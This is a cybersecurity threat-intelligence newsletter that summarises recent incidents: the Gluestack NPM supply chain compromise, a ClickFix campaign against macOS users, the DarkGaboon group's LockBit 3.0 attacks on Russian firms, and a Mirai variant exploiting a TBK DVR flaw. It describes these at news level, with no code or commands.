MALWARE ACTIVITY
Rising Tide of Supply Chain and Social Engineering Attacks in Cybersecurity
Recent cybersecurity incidents underscore the escalating risks in software supply chains and social engineering tactics. A supply chain attack compromised Gluestack's NPM packages, which are downloaded nearly a million times weekly. Attackers injected malicious code that facilitates data theft, remote access, and ongoing malware deployment. Researchers also discovered additional advanced malware within these packages, including backdoors and destructive payloads, highlighting the urgent need for vigilant package management and swift patching. Concurrently, a campaign utilizing the ClickFix social engineering has targeted macOS users. They use fake web pages to impersonate trusted services like Spectrum and trick victims into executing shell scripts that install info stealers and RATs. These attacks, attributed to Russian-speaking threat actors, exploit human trust and routine verification processes. Collectively, these incidents highlight the critical importance for organizations and individuals to adopt comprehensive security practices, including thorough code review, vigilant monitoring, and user awareness, to defend against increasingly sophisticated cyber adversaries. CTIX analysts will continue to report on the latest malware strains and attack methodologies.
- BleepingComputer: Supply Chain Attack Hits Gluestack NPM Packages article
- TheHackerNews: New Supply Chain Malware Operation Hits NPM and PyPI article
- TheHackerNews: New Atomic MacOS Stealer Campaign article
THREAT ACTOR ACTIVITY
Hacker Group Using Publicly Leaked LockBit 3.0 Ransomware to Target Russian Companies
DarkGaboon, a financially motivated cybercrime group, has been targeting Russian companies across various sectors, including banking, retail, tourism, and public services, with a series of ransomware attacks. Initially identified by researchers in January, DarkGaboon's operations trace back to 2023. In its recent spring campaign, DarkGaboon has deployed LockBit 3.0 ransomware against Russian victims. This version of LockBit, publicly leaked in 2022, is widely used by cybercriminals, but DarkGaboon operates independently rather than as part of the ransomware-as-a-service (RaaS) model typical of LockBit affiliates. DarkGaboon's attacks begin with phishing emails written in Russian, targeting financial department employees with urgent messages and malicious attachments disguised as legitimate financial documents. The lure documents are based on templates from legitimate Russian-language sources and have remained consistent since 2023. Upon breaching a victim's network, DarkGaboon encrypts files using LockBit 3.0 and leaves a ransom note in Russian, listing contact email addresses. Researchers found no evidence of data exfiltration in recent incidents. Notably, the email addresses in the ransom notes were linked to previous LockBit attacks on Russian financial institutions in early 2023. While the individuals behind DarkGaboon remain unidentified, they are believed to be fluent in Russian. The group employs open-source tools like Revenge RAT, XWorm, and LockBit ransomware to blend in with the broader cybercriminal landscape, complicating attribution efforts. LockBit ransomware variants have previously targeted Russian entities. In December, hackers used it to attack the largest dairy processing plant in southern Siberia shortly after the company provided humanitarian aid for Russian soldiers in Ukraine. However, no specific threat actor has been attributed to that attack.
VULNERABILITIES
Mirai Resurfaces: New Variant Exploits DVR Flaw to Build Stealthier Botnet Army
A newly observed variant of the Mirai botnet is actively exploiting CVE-2024-3721, a command injection vulnerability in TBK DVR-4104 and DVR-4216 digital video recorders, to conscript them into a growing botnet. Originally disclosed by researcher "netsecfish" in April 2024, the flaw allows attackers to execute shell commands via maliciously crafted POST requests. Kaspersky researchers detected this exploit in their Linux honeypots, where the malware delivers an ARM32 binary without prior architecture checks; an efficiency made possible by the DVRs' uniform ARM32 support. Built on Mirai's decade-old source code, this new variant introduces enhancements including RC4-encrypted strings with XOR obfuscation, anti-virtualization/emulation checks, and execution path verification to avoid detection. Once infected, devices are linked to a command-and-control (C2) server for use in distributed-denial-of-service (DDoS) attacks or proxying malicious traffic. Despite netsecfish's earlier estimate of 114,000 vulnerable devices, Kaspersky found roughly 50,000 still exposed, with infections largely in China, India, Egypt, Ukraine, Russia, Turkey, and Brazil. Further complicating mitigation, these DVR models have been widely rebranded under various names, and it's unclear whether TBK Vision has issued patches. The case underscores how quickly threat actors adopt public exploits and the need for timely updates or factory resets to prevent persistent compromise. Any device owners and administrators should ensure that they've upgraded to the latest version to prevent exploitation.
The content of this article is intended to provide a general guide to the subject matter. Specialist advice should be sought about your specific circumstances.
